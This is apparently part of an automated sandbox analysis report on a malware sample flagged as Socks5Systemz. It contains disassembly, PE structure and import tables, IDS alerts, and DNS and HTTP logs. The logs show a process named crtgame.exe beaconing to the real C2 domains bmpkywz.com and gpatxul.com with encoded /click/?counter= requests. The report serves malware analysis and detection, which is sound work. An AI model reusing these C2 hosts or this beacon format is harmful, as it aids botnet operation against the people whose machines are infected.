                                                                                  call 00007FB898D773B2h
                                                                                  call 00007FB898D77641h
                                                                                  call 00007FB898D79678h
                                                                                  call 00007FB898D796BFh
                                                                                  call 00007FB898D7BFEEh
                                                                                  call 00007FB898D7C155h
                                                                                  xor eax, eax
                                                                                  push ebp
                                                                                  push 0040A2FCh
                                                                                  push dword ptr fs:[eax]
                                                                                  mov dword ptr fs:[eax], esp
                                                                                  xor edx, edx
                                                                                  push ebp
                                                                                  push 0040A2C5h
                                                                                  push dword ptr fs:[edx]
                                                                                  mov dword ptr fs:[edx], esp
                                                                                  mov eax, dword ptr [0040C014h]
                                                                                  call 00007FB898D7CBBBh
                                                                                  call 00007FB898D7C7EEh
                                                                                  lea edx, dword ptr [ebp-10h]
                                                                                  xor eax, eax
                                                                                  call 00007FB898D79CA8h
                                                                                  mov edx, dword ptr [ebp-10h]
                                                                                  mov eax, 0040CDE8h
                                                                                  call 00007FB898D76257h
                                                                                  push 00000002h
                                                                                  push 00000000h
                                                                                  push 00000001h
                                                                                  mov ecx, dword ptr [0040CDE8h]
                                                                                  mov dl, 01h
                                                                                  mov eax, 0040738Ch
                                                                                  call 00007FB898D7A537h
                                                                                  mov dword ptr [0040CDECh], eax
                                                                                  xor edx, edx
                                                                                  push ebp
                                                                                  push 0040A27Dh
                                                                                  push dword ptr fs:[edx]
                                                                                  mov dword ptr fs:[edx], esp
                                                                                  call 00007FB898D7CC2Bh
                                                                                  mov dword ptr [0040CDF4h], eax
                                                                                  mov eax, dword ptr [0040CDF4h]
                                                                                  cmp dword ptr [eax+0Ch], 01h
                                                                                  jne 00007FB898D7CD6Ah
                                                                                  mov eax, dword ptr [0040CDF4h]
                                                                                  mov edx, 00000028h
                                                                                  call 00007FB898D7A938h
                                                                                  mov edx, dword ptr [000000F4h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9364 | 0x9400 | 0d7ac17dafcd52a9b3ea353c32256c1d | False | 0.6148648648648649 | data | 6.56223225792919 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | 45829356498700390b8c7afa10ea05a4 | False | 0.31640625 | data | 2.7585022150416294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 43577978bf2d75a61193942dc91f8094 | False | 0.32262073863636365 | data | 4.461255394707395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.27483443708609273
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T12:03:18.946257+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:18.946257+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:32.086598+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49849 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:32.086598+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49849 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:45.242156+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49879 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:45.242156+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49879 | 94.232.249.187 | 80 | TCP
2024-12-14T12:03:51.955829+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:51.955829+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:55.782950+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:55.782950+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:57.296460+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:57.296460+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:58.928983+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T12:03:58.928983+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:00.442523+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49935 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:00.442523+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49935 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:01.954791+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49937 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:01.954791+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49937 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:03.481805+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:03.481805+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:05.048266+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49948 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:05.048266+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49948 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:06.703781+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49951 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:06.703781+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49951 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:08.238263+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:08.238263+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:09.749286+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49961 | 185.237.206.129 | 80 | TCP
2024-12-14T12:04:09.749286+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49961 | 185.237.206.129 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Dec 14, 2024 12:04:02.196254969 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:02.316817045 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.479429007 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.481805086 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.604144096 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.604629040 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.724678993 CET8049942185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.724724054 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:03.724836111 CET4994280192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.724870920 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.725128889 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:03.844990969 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.047827005 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.048265934 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.166268110 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.166565895 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.293555975 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.293615103 CET8049948185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:05.293654919 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.293699026 CET4994880192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.293818951 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:05.537107944 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.699769020 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.703780890 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.838131905 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.838283062 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.958087921 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.958304882 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.958384991 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:06.958441973 CET8049951185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:06.958626032 CET4995180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:07.078490973 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.238189936 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.238262892 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.353626966 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.354020119 CET4996180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.473787069 CET8049955185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.473855972 CET4995580192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.473988056 CET8049961185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:08.474240065 CET4996180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.474240065 CET4996180192.168.2.5185.237.206.129
                                                                                  Dec 14, 2024 12:04:08.594677925 CET8049961185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:09.749092102 CET8049961185.237.206.129192.168.2.5
                                                                                  Dec 14, 2024 12:04:09.749285936 CET4996180192.168.2.5185.237.206.129
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2024 12:02:58.445082903 CET | 54578 | 53 | 192.168.2.5 | 194.49.94.194
Dec 14, 2024 12:02:59.446168900 CET | 54578 | 53 | 192.168.2.5 | 194.49.94.194
Dec 14, 2024 12:03:00.460618973 CET | 54578 | 53 | 192.168.2.5 | 194.49.94.194
Dec 14, 2024 12:03:02.476444006 CET | 54578 | 53 | 192.168.2.5 | 194.49.94.194
Dec 14, 2024 12:03:06.476913929 CET | 54578 | 53 | 192.168.2.5 | 194.49.94.194
Dec 14, 2024 12:03:10.493789911 CET | 62442 | 53 | 192.168.2.5 | 152.89.198.214
Dec 14, 2024 12:03:10.772625923 CET | 53 | 62442 | 152.89.198.214 | 192.168.2.5
Dec 14, 2024 12:03:50.259462118 CET | 60087 | 53 | 192.168.2.5 | 81.31.197.38
Dec 14, 2024 12:03:50.499217987 CET | 53 | 60087 | 81.31.197.38 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 12:02:58.445082903 CET | 192.168.2.5 | 194.49.94.194 | 0x7153 | Standard query (0) | bmpkywz.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:02:59.446168900 CET | 192.168.2.5 | 194.49.94.194 | 0x7153 | Standard query (0) | bmpkywz.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:03:00.460618973 CET | 192.168.2.5 | 194.49.94.194 | 0x7153 | Standard query (0) | bmpkywz.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:03:02.476444006 CET | 192.168.2.5 | 194.49.94.194 | 0x7153 | Standard query (0) | bmpkywz.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:03:06.476913929 CET | 192.168.2.5 | 194.49.94.194 | 0x7153 | Standard query (0) | bmpkywz.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:03:10.493789911 CET | 192.168.2.5 | 152.89.198.214 | 0x3f89 | Standard query (0) | bmpkywz.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:03:50.259462118 CET | 192.168.2.5 | 81.31.197.38 | 0x5f44 | Standard query (0) | gpatxul.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 12:03:10.772625923 CET | 152.89.198.214 | 192.168.2.5 | 0x3f89 | No error (0) | bmpkywz.com | | 94.232.249.187 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 12:03:50.499217987 CET | 81.31.197.38 | 192.168.2.5 | 0x5f44 | No error (0) | gpatxul.com | | 185.237.206.129 | A (IP address) | IN (0x0001) | false
                                                                                  • bmpkywz.com
                                                                                  • gpatxul.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:10.942848921 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
Host: bmpkywz.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49849 | 94.232.249.187 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:24.082729101 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
Host: bmpkywz.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49879 | 94.232.249.187 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:37.230643034 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
Host: bmpkywz.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49911 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:50.626348972 CET | 295 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:03:51.954881907 CET | 840 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:03:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Dec 14, 2024 12:03:55.351862907 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:03:55.782871008 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:03:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:56.019552946 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:03:57.295629025 CET | 702 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:03:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
                                                                                  Data Ascii: 1eede2fe88e261d4749b96478393969f80739ff0e55824e0ed9e7a692bea52cc1646a7d5bcfd65adc4947d24d9358f64beeacf7499b5c96390193258a5c869e3a3c6d47a73f2276ca9d662d8889d032524c8edf07e713ccdb42b026351c54cb5c2ada58f522854159aa2cf4a41c975259a2b7a382ffd5ba57e0f9a999d927278311b83aea7119a0b278a71dddb47d8610a9d5933c4399b8d1279de280fe1efc58df502fdb28ae972fc07a0d4b469ad9ecd8e9786749253cab62f2b028283da8c57a662618e09b7a5a4ea657b5affcda3c3f13192944d207ce5d0b56ea16072083f8c37c8c88d6860d5631c5a9596ce3ff6c5796e3538518c70


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:57.648672104 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:03:58.928916931 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:03:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49935 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:03:59.162739038 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:04:00.442317963 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:04:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
Data Ascii: ede2ff49a2e11370


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49937 | 185.237.206.129 | 80 | 7156 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 12:04:00.681715965 CET | 303 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1
Host: gpatxul.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 14, 2024 12:04:01.954699993 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 14 Dec 2024 11:04:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
